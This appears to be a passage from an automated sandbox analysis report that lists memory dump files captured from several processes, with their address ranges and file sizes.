memory/2628-93-0x000007FEF4EE0000-0x000007FEF58CC000-memory.dmpFilesize
9.9MB
-
memory/2628-98-0x0000000019390000-0x0000000019392000-memory.dmpFilesize
8KB
-
memory/2628-99-0x0000000019394000-0x0000000019396000-memory.dmpFilesize
8KB
-
memory/2628-125-0x000000001939A000-0x00000000193B9000-memory.dmpFilesize
124KB
-
memory/2644-199-0x0000000019464000-0x0000000019466000-memory.dmpFilesize
8KB
-
memory/2644-191-0x0000000000000000-mapping.dmp
-
memory/2644-195-0x000007FEF4EE0000-0x000007FEF58CC000-memory.dmpFilesize
9.9MB
-
memory/2644-198-0x0000000019460000-0x0000000019462000-memory.dmpFilesize
8KB
-
memory/2732-115-0x0000000000000000-mapping.dmp
-
memory/2736-235-0x0000000000000000-mapping.dmp
-
memory/2740-118-0x000007FEF4EE0000-0x000007FEF58CC000-memory.dmpFilesize
9.9MB
-
memory/2740-121-0x0000000019780000-0x0000000019782000-memory.dmpFilesize
8KB
-
memory/2740-122-0x0000000019784000-0x0000000019786000-memory.dmpFilesize
8KB
-
memory/2740-116-0x0000000000000000-mapping.dmp
-
memory/2788-168-0x000007FEF4EE0000-0x000007FEF58CC000-memory.dmpFilesize
9.9MB
-
memory/2788-179-0x0000000019584000-0x0000000019586000-memory.dmpFilesize
8KB
-
memory/2788-178-0x0000000019580000-0x0000000019582000-memory.dmpFilesize
8KB
-
memory/2788-158-0x0000000000000000-mapping.dmp
-
memory/2788-236-0x000000001958A000-0x00000000195A9000-memory.dmpFilesize
124KB
-
memory/2792-232-0x0000000000000000-mapping.dmp
-
memory/2864-233-0x0000000000000000-mapping.dmp
-
memory/2924-216-0x0000000000000000-mapping.dmp
-
memory/2964-218-0x0000000000000000-mapping.dmp
-
memory/2976-220-0x0000000000000000-mapping.dmp
-
memory/3036-149-0x0000000000000000-mapping.dmp
-
memory/3040-150-0x0000000000000000-mapping.dmp
-
memory/3068-312-0x0000000000F00000-0x0000000000F02000-memory.dmpFilesize
8KB
-
memory/3068-282-0x00000000192E0000-0x00000000192E1000-memory.dmpFilesize
4KB
-
memory/3068-298-0x0000000000950000-0x0000000000951000-memory.dmpFilesize
4KB
-
memory/3068-324-0x0000000000AE0000-0x0000000000AE1000-memory.dmpFilesize
4KB
-
memory/3068-303-0x0000000000F1A000-0x0000000000F39000-memory.dmpFilesize
124KB
-
memory/3068-323-0x0000000000F3A000-0x0000000000F3B000-memory.dmpFilesize
4KB
-
memory/3068-322-0x0000000000F39000-0x0000000000F3A000-memory.dmpFilesize
4KB
-
memory/3068-152-0x0000000000000000-mapping.dmp
-
memory/3068-281-0x0000000000940000-0x0000000000942000-memory.dmpFilesize
8KB
-
memory/3068-162-0x000007FEF4EE0000-0x000007FEF58CC000-memory.dmpFilesize
9.9MB
-
memory/3068-169-0x0000000000F10000-0x0000000000F12000-memory.dmpFilesize
8KB
-
memory/3068-170-0x0000000000F14000-0x0000000000F16000-memory.dmpFilesize
8KB
-
memory/3068-283-0x0000000019F10000-0x0000000019F11000-memory.dmpFilesize
4KB
-
memory/3068-275-0x0000000000930000-0x0000000000932000-memory.dmpFilesize
8KB
-
memory/3320-317-0x000000001A2E0000-0x000000001A2E1000-memory.dmpFilesize
4KB
-
memory/3320-318-0x00000000008F0000-0x00000000008F1000-memory.dmpFilesize
4KB
-
memory/3320-313-0x0000000001040000-0x0000000001041000-memory.dmpFilesize
4KB
-
memory/3320-321-0x00000000011D0000-0x00000000011D2000-memory.dmpFilesize
8KB
-
memory/3320-304-0x0000000001070000-0x0000000001072000-memory.dmpFilesize
8KB
-
memory/3320-305-0x0000000001074000-0x0000000001076000-memory.dmpFilesize
8KB
-
memory/3320-300-0x000007FEF4EE0000-0x000007FEF58CC000-memory.dmpFilesize
9.9MB
-
memory/3908-267-0x00000000008A0000-0x00000000008B1000-memory.dmpFilesize
68KB